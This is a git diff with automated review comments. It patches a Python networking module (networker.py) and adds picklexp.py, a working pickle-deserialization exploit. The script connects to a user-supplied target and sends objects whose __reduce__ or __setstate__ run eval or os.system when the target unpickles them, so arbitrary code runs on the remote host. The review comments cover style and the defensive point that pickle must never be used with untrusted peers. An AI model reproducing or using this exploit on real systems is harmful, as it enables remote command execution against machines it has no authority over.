diff --git a/networker.py b/networker.py
index 674dba5..8c2f4c7 100644
--- a/networker.py
+++ b/networker.py
@@ -100,14 +100,19 @@ class Connection:
     threads = dict()
     actives = dict()
     def __init__(self, binder, translator, onconn, onrecv, onend):
-        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        self.socket.bind(binder)
-        self.socket.listen(8)
+        if binder != None:
+            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            self.socket.bind(binder)
+            self.socket.listen(8)
+        else:
+            self.socket = None
         self.translator = translator
         self.onconn = onconn
         self.onrecv = onrecv
         self.onend = onend
     def listener(self):
+        if self.socket == None:
+            return
         while self.active:
             s, a = self.socket.accept()
             ac = a[0] + ":" + str(a[1])
@@ -193,7 +198,7 @@ class Connection:
                 break
             time.sleep(0.0001)
         self.threads.clear()
-        self.socket.close()
+        if self.socket != None: self.socket.close()
     def addresses(self):
         if self.active:
diff --git a/picklexp.py b/picklexp.py
new file mode 100644
index 0000000..a3a07a8
--- /dev/null
+++ b/picklexp.py
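Review bot: `binder != None` in `__init__` and `self.socket == None` in `listener` compare against `None` with equality; the identity form `if binder is not None:` / `if self.socket is None:` is the idiom, and the same applies to the `!= None` one-liner in the second hunk, which should also put `self.socket.close()` on its own line. The new early return in `listener` is silent: a client-only `Connection` (the `None` binder that the new picklexp.py passes) started as a listener simply exits, so a comment such as `# client-only Connection: no listening socket to accept on` would make the intent explicit. It is also worth documenting on `__init__` that whatever `translator` is passed decodes bytes from every peer that reaches `accept()`, so a pickle-based translator must only be used with peers that are trusted or authenticated; the companion picklexp.py in this same commit exercises exactly that path. `listener`'s body continues outside the hunk.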
@@ -0,0 +1,95 @@
+#BSD 3-Clause, (C) Alfred Manville 2022
+#Be RESPONSIBLE when using this!
+import networker as net
+import pickle
+import traceback
+import sys
+
+#Payloads:
+#State payloads only work if the Object is available at the target
+
+class StatePXP:
+    def __init__(self, data):
+        self.data = data
+    def __getstate__(self):
+        return self.data
+    def __setstate__(self, state):
+        self.data = state
+        print(self.data)
+
+class ReducePXP:
+    def __init__(self, data):
+        self.data = data
+    def __reduce__(self):
+        return print, (self.data,)
+
+class StateEXP:
+    def __init__(self, data):
+        self.data = data
+    def __getstate__(self):
+        return self.data
+    def __setstate__(self, state):
+        self.data = state
+        eval(self.data)
+
+class ReduceEXP:
+    def __init__(self, data):
+        self.data = data
+    def __reduce__(self):
+        return eval, (self.data,)
+
+class ReduceSXP:
+    def __init__(self, data):
+        self.data = data
+    def __reduce__(self):
+        import os
+        return os.system, (self.data,)
+
+payloads = (StatePXP(""), ReducePXP(""), StateEXP(""), ReduceEXP(""), ReduceSXP(""))
+payload = None
+taddr = ""
+tport = 0
+plid = 0
+pldata = ""
+
+def onx(a):
+    pass
+
+def ony(a, m):
+    pass
+
+def main():
+    conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx)
+    print("Running Exploit @ " + taddr + ":" + str(tport))
+    print("Exploit: " + str(type(payload)) + " ; Data: " + pldata)
+    try:
+        conn.connect((taddr, tport))
+        print("Exploiting...")
+        conn.send(taddr+":"+str(tport), payload)
+        print("Exploited!")
+    except:
+        print(traceback.format_exc())
+    conn.close()
+    exit
+
+if __name__ == "__main__":
+    print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause")
+    if len(sys.argv) > 1:
+        taddr = sys.argv[1]
+    else:
+        taddr = input("Enter the target address: ")
+    if len(sys.argv) > 2:
+        tport = int(sys.argv[2])
+    else:
+        tport = int(input("Enter the target port: "))
+    if len(sys.argv) > 3:
+        plid = int(sys.argv[3]) - 1
+    else:
+        plid = int(input("Enter the payload position " + str(payloads) + " : ")) - 1
+    if len(sys.argv) > 4:
+        pldata = sys.argv[4]
+    else:
+        pldata = input("Enter the payload data: ")
+    payload = payloads[plid]
+    payload.data = pldata
+    main()
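Review bot: `import pickle` is never used in this module — the encoding is done by the `net.PickleTranslate()` instance handed to `Connection` — so the line should go, or the header comment should say which layer actually serializes. The bare `except:` around `conn.connect`/`conn.send` also swallows `KeyboardInterrupt` and `SystemExit`; `except Exception:` keeps the traceback print without that side effect, and the trailing `exit` is a bare name rather than a call, so it does nothing. Since each class here relies on its `__reduce__`/`__setstate__` running during the receiver's unpickle step (presumably inside `PickleTranslate`; that code is not in this diff), the header comment is the right place to state the defensive conclusion for networker.py users: never pair `PickleTranslate` with unauthenticated peers, and prefer a non-executing wire format such as JSON or an `Unpickler` whose `find_class` is restricted.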